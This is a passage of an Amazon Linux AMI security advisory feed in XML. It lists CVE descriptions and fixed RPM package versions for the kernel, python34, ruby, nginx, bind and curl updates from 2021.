1946684: CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation
CVE-2021-28971:
A flaw was found in the Linux kernel. On some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled.
1941784: CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c
CVE-2021-28964:
A race condition flaw was found in get_old_root in fs/btrfs/ctree.c in the Linux kernel in btrfs file-system. This flaw allows a local attacker with a special user privilege to cause a denial of service due to not locking an extent buffer before a cloning operation. The highest threat from this vulnerability is to system availability.
1941804: CVE-2021-28964 kernel: race condition in get_old_root function in fs/btrfs/ctree.c because of a lack of locking on an extent buffer before a cloning operation
CVE-2021-28688:
99999:
CVE-2021-23133:
A use-after-free flaw was found in the Linux kernel's SCTP socket functionality that triggers a race condition. This flaw allows a local user to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1948772: CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del
CVE-2020-29374:
An issue was discovered in the Linux kernel related to mm/gup.c and mm/huge_memory.c. The get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider the semantics of read operations and therefore can grant unintended write access.
1903249: CVE-2020-29374 kernel: the get_user_pages implementation when used for a copy-on-write page does not properly consider the semantics of read operations and therefore can grant unintended write access
CVE-2020-25673:
1894558: CVE-2020-25673 kernel: non-blocking socket in llcp_sock_connect()
CVE-2020-25672:
No description is available for this CVE.
99999:
CVE-2020-25672 kernel: memory leak in llcp_sock_connect()
CVE-2020-25671:
No description is available for this CVE.
99999:
CVE-2020-25671 kernel: refcount leak in llcp_sock_connect()
CVE-2020-25670:
No description is available for this CVE.
99999:
CVE-2020-25670 kernel: refcount leak in llcp_sock_bind()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25670" title="" id="CVE-2020-25670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25671" title="" id="CVE-2020-25671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25672" title="" id="CVE-2020-25672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25673" title="" id="CVE-2020-25673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29374" title="" id="CVE-2020-29374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23133" title="" id="CVE-2021-23133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28688" title="" id="CVE-2021-28688" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28964" title="" id="CVE-2021-28964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28971" title="" id="CVE-2021-28971" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29154" title="" id="CVE-2021-29154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29155" title="" id="CVE-2021-29155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31829" title="" id="CVE-2021-31829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31916" title="" id="CVE-2021-31916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33033" title="" id="CVE-2021-33033" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1504</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1504: low priority package update for python34</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web cache poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-debuginfo" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1505</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1505: low priority package update for ruby20</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31799:
RDoc before version 6.3.1 used to call Kernel#open to open a local file. If a Ruby project has a file whose name starts with "|" and ends with "tags", the command following the pipe character is executed. A malicious Ruby project could exploit it to run an arbitrary command execution against a user who attempts to run the rdoc command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31799" title="" id="CVE-2021-31799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems20-devel" version="2.0.14.1" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.40.amzn1.noarch.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.40.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.40.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1506</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1506: low priority package update for ruby24</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31799:
RDoc before version 6.3.1 used to call Kernel#open to open a local file. If a Ruby project has a file whose name starts with "|" and ends with "tags", the command following the pipe character is executed. A malicious Ruby project could exploit it to run an arbitrary command execution against a user who attempts to run the rdoc command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31799" title="" id="CVE-2021-31799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.15.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.15.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.15.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.15.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.15.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1507</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1507: important priority package update for nginx</title><issued date="2021-06-01 17:58:00" /><updated date="2021-06-02 00:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23017:
A flaw was found in nginx. An off-by-one error while processing DNS responses allows a network attacker to write a dot character out of bounds in a heap allocated buffer which can allow overwriting the least significant byte of next heap chunk metadata likely leading to a remote code execution in certain circumstances. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1963121: CVE-2021-23017 nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23017" title="" id="CVE-2021-23017" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1508</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1508: important priority package update for bind</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25215:
A flaw was found in bind. The way DNAME records are processed may trigger the same RRset to the ANSWER section to be added more than once which causes an assertion check to fail. The highest threat from this flaw is to system availability.
1953857: CVE-2021-25215 bind: An assertion check can fail while answering queries for DNAME records that require the DNAME to be processed to resolve itself
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25215" title="" id="CVE-2021-25215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1509</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1509: medium priority package update for curl</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22898:
A vulnerability was found in curl where a flaw in the option parser for sending NEW_ENV variables libcurl can pass uninitialized data from a stack-based buffer to the server. This issue leads to potentially revealing sensitive internal information to the server using a clear-text network protocol. The highest threat from this vulnerability is to confidentiality.
1964887: CVE-2021-22898 curl: TELNET stack contents disclosure
CVE-2021-22876:
It was discovered that libcurl did not remove authentication credentials from URLs when automatically populating the Referer HTTP request header while handling HTTP redirects. This could lead to exposure of the credentials to the server to which requests were redirected.
1941964: CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer
